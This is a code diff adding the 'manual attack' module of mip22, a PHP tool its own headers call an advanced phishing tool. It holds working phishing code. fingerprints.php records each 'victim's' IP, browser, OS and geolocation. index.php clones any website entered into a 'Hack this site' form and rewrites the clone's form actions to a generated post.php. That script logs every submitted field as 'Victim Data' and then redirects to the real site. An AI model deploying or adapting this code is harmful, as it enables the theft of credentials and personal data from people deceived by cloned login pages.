Add files via upload

.manual_attack/__ROOT__/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nMANUL METHOD VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

.manual_attack/__ROOT__/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

.manual_attack/__SRC__/class_tools.php

@@ -0,0 +1,83 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+    class INPUT_DATA
+    { 
+    
+      public function SAFE_DATA_ENTER($data)
+        {
+        $data = htmlspecialchars($data);
+        $data = htmlentities($data);
+        $data = trim($data);
+        $data = stripslashes($data);  
+        $data = stripcslashes ($data);
+
+          if ($data == true)
+           {
+          return ($data);
+            }          
+
+          else
+            {
+            return (!$data) .trigger_error("Data was not be send safe");
+             }
+
+         } 
+    
+      } // end fo class INPUT_DATA
+      
+      
+
+
+
+
+
+
+
+  class INPUT_DATA_AVAILABLE extends INPUT_DATA
+    { 
+    
+      public function SAFE_DATA_ENTER($data)
+        {
+        $data = htmlspecialchars($data);
+        $data = htmlentities($data);
+        $data = trim($data);
+        $data = stripslashes($data);  
+        $data = stripcslashes ($data);
+
+          if ($data == true)
+           {
+          return ($data);
+            }          
+
+          else
+            {
+            return (!$data) .trigger_error("Data was not be send safe");
+             }
+
+         } 
+    
+      } // end fo class INPUT_DATA_AVAILABLE
+      
+
+
+?>

.manual_attack/css/index.css

@@ -0,0 +1,285 @@
+/*
+*  Copyright (c) 2020 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  proxphish is a advanced phishing tool.
+*
+*  proxphish is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  proxphish is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+#body
+{
+background-image:url('');
+background-repeat:no-repeat;
+background-size:100%;
+background-color:;
+}
+
+
+
+#form1
+{
+background-color:;
+border-style:;
+border-width:;
+border-color:;
+height:;
+width:;
+}
+
+
+
+#h2
+{
+}
+
+
+
+
+input {
+  border: 0;
+  outline: 0;
+  background: transparent;
+  border-bottom: 1px solid white;
+ color:white;
+}
+
+
+
+
+#site
+{
+height:3.5em;
+width:27em;
+text-align:center;
+font-size: 20px;
+color:white;
+}
+
+
+
+
+#ip
+{
+height:3.5em;
+width:27em;
+text-align:center;
+font-size: 20px;
+color:white;
+}
+
+
+
+#select_site
+{
+height:3.5em;
+width:28em;
+text-align:center;
+border: 0;
+outline: 0;
+background: transparent;
+border-bottom: 2px solid white;
+border-top: 0px;
+font-size: 20px;
+color: white;
+background-color: #272434;
+}
+
+
+
+
+
+#select_site:hover
+{
+height:3.5em;
+width:28em;
+text-align:center;
+border: 0;
+outline: 0;
+background: transparent;
+border-bottom: 2px solid white;
+border-top: 0px;
+font-size: 20px;
+color: green;
+background-color: #272434;
+}
+
+
+
+
+#submit
+{
+position: absolute; left: -9999px;
+}
+
+
+
+
+
+#footer
+{
+position:fixed;
+bottom:10%;
+left:50%;
+margin-left:-300px; /*negative half the width */
+background:;
+}
+
+
+
+
+
+input[placeholder], [placeholder], *[placeholder] {
+    color: white !important;
+font-weight:bold;
+}
+
+
+
+
+.a
+{
+margin: 0 auto; 
+display: block;
+width: 200px;
+height: 25px;
+background: grey;
+padding: 10px;
+text-align: center;
+border-radius: 5px;
+color: white;
+text-decoration: none;
+font-weight: bold;
+}
+
+
+.a:hover
+{
+margin: 0 auto; 
+display: block;
+width: 200px;
+height: 25px;
+background: #9C9595;
+padding: 10px;
+text-align: center;
+border-radius: 5px;
+color: white;
+text-decoration: none;
+font-weight: bold;
+}
+
+
+
+
+
+.a2
+{
+margin: 0 auto; 
+display: block;
+width: 100%;
+height: 20px;
+background: grey;
+padding: 10px;
+text-align: center;
+border-radius: 5px;
+color: white;
+text-decoration: none;
+font-weight: bold;
+}
+
+
+.a2:hover
+{
+margin: 0 auto; 
+display: block;
+width: 100%;
+height: 20px;
+background: #9C9595;
+padding: 10px;
+text-align: center;
+border-radius: 5px;
+color: white;
+text-decoration: none;
+font-weight: bold;
+}
+
+
+
+
+
+
+
+.shell-wrap 
+{
+height: 98%;
+width: 98%;
+margin: 1px auto 0 auto;
+box-shadow: 0 0 30px rgba(0,0,0,0.4);
+-webkit-border-radius: 3px;
+-moz-border-radius: 3px;
+border-radius: 3px;
+ 
+background:  #272434; /* Old browsers */
+
+}
+ 
+.shell-top-bar {
+text-align: center; 
+color: white;
+padding: 20px;
+margin: 0;
+text-shadow: 1px 1px 0 rgba(255,255,255,0.5);
+font-size: 1.5em;
+border: 0px solid #CCCCCC;
+border-bottom: none;
+ 
+-webkit-border-top-left-radius: 3px;
+-webkit-border-top-right-radius: 3px;
+-moz-border-radius-topleft: 3px;
+-moz-border-radius-topright: 3px;
+border-top-left-radius: 3px;
+border-top-right-radius: 3px;
+ 
+background: white; /* Old browsers */
+
+
+background-image: url('icons/icon.png'), url('icons/icon.png');
+background-repeat: no-repeat, no-repeat;
+background-position: top right, top left; 
+background-size: 11% 100%, 11% 100%; 
+
+}
+
+
+
+
+table 
+{
+width: 96%;
+position:fixed;
+bottom:3%;
+left:0%;
+margin-left:0px; /*negative half the width */
+background-color: transparent;
+color: white;
+border-collapse: collapse;
+overflow: hidden;
+}
+
+
+th 
+{
+padding: 7px;
+text-align: center;
+}

.manual_attack/index.php

@@ -0,0 +1,238 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+ini_set('display_errors', 1);
+ini_set('display_startup_errors', 1);
+error_reporting(E_ALL);
+
+?>
+
+
+<html>
+<head>
+
+   <title> Mip22 </title>
+  
+  <link rel="icon" type="image/jpg" href="/css/icons/logo.png" />
+
+ 
+<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
+<meta http-equiv="Pragma" content="no-cache" />
+<meta http-equiv="Expires" content="0" />
+
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+
+
+<style>
+
+body
+{
+background-image: url("img/back2.jpeg");
+background-repeat: no-repeat;
+background-size: auto;
+}
+
+
+#site
+{
+height:3em;
+width: 25em;
+margin: 0 auto;
+border: 1px solid black;
+border-radius: 10px;
+font-size: 15px;
+text-align:center;
+}
+
+
+#butt
+{
+height:2.5em;
+width: 25em;
+background-color: e74f5b;
+color: white;
+margin: 0 auto;
+border: 1px solid black;
+border-radius: 10px;
+font-size: 15px;
+}
+
+
+
+#butt:hover
+{
+height:2.5em;
+width: 25em;
+background-color: red;
+color: white;
+margin: 0 auto;
+border: 1px solid black;
+border-radius: 10px;
+}
+
+@import url('https://fonts.googleapis.com/css?family=Suez+One');
+#text{
+    font-family: "Suez One", serif;
+    font-weight: bold;
+    text-align: center;
+    font-size: 35px;
+    color: rgb(255, 0, 34);
+    background-color: rgba(0, 0, 0, 0);
+    text-shadow: rgb(0, 0, 0) 2px 2px 2px;
+}
+
+</style>
+
+	
+
+</head>
+
+
+<body>
+
+
+
+<div align="center">
+  
+      <br>
+		
+	  <font size="7"> 
+		<span id="text"> Mip22 <br> Missions Impossibles </span>
+		 </font>   
+		     
+               <br>
+         
+         <img src="img/logo.png" height="250px" width="250px"
+              style="background-color:transparent;">
+       
+
+	 
+	  
+ <form action="" method="post" >
+	 
+ 
+ <input type="text" name="site_hack" minlength="7" maxlength="256" placeholder="Enter a web site ec: http(s)://www.website.com"  
+   id="site" required>  
+      <br> 
+     <br>
+   <input type="submit" name="hack" value="Hack this site" id="butt"> 
+  </form>
+
+
+
+</div>
+
+
+</body>
+
+
+
+</html>
+
+
+
+<?php
+
+
+  require_once('__SRC__/class_tools.php');
+
+  if (class_exists('INPUT_DATA_AVAILABLE')) 
+    {
+    $obj_data = new INPUT_DATA_AVAILABLE;
+      
+
+
+
+  if(isset($_POST['hack']))
+      {
+      $site_hack = $obj_data-> SAFE_DATA_ENTER($_POST['site_hack']);
+ 
+
+     $site_name = "index"; 
+
+     $url    = $site_hack;
+     $name   = $site_name.'.html';
+     $file   = file($url);
+     $result = file_put_contents($name, $file);
+
+
+     chmod("index.html", 0777);
+
+
+    $post_data_txt = fopen("data.txt", "w") or die("Unable to open file!");
+    $lines_data_txt = PHP_EOL;
+    fwrite($post_data_txt, $lines_data_txt);
+    fclose($post_data_txt);
+
+ 
+     chmod("data.txt", 0777);
+
+
+
+
+    $post_file_php = fopen("post.php", "w") or die("Unable to open file!");
+    $lines_php = '<?php $file = "data.txt";' .PHP_EOL
+      .'file_put_contents($file, print_r('."'$site_hack Victim Data \n'".', true), FILE_APPEND);' .PHP_EOL
+      .'file_put_contents($file, print_r($_POST, true), FILE_APPEND);' .PHP_EOL
+      . 'file_put_contents($file, print_r("Array_end\n\n", true), FILE_APPEND);' .PHP_EOL
+      .'?>'
+      .PHP_EOL
+      ."<meta http-equiv='refresh' content='0; url=$site_hack'/>";
+
+    fwrite($post_file_php, $lines_php);
+    fclose($post_file_php);
+
+     
+
+      chmod("post.php", 0777);
+
+
+
+  $path_to_file = 'index.html';
+  $file_contents = file_get_contents($path_to_file);
+  $file_contents = str_replace('action="','action="post.php" " ',$file_contents);
+  file_put_contents($path_to_file,$file_contents);
+   
+   
+   echo "<div align='center'> 
+            <br>
+          <font size='4' color='red' style='background-color:white;'> 
+           The website $site_hack hack successfully </font> 
+            <br>
+          <font size='4' color='red' style='background-color:white;'> 
+          Return to terminal and continue the attack. </font>  
+         </div>"; 
+   
+   
+  #echo '<script type="text/javascript">alert("The website hack successfully");
+     #    </script>';
+     #echo ("<script>location.href='http://127.0.0.1:8080'</script>");
+
+
+ } // end of isset
+
+
+
+  } // end of if exists class tools
+
+
+?>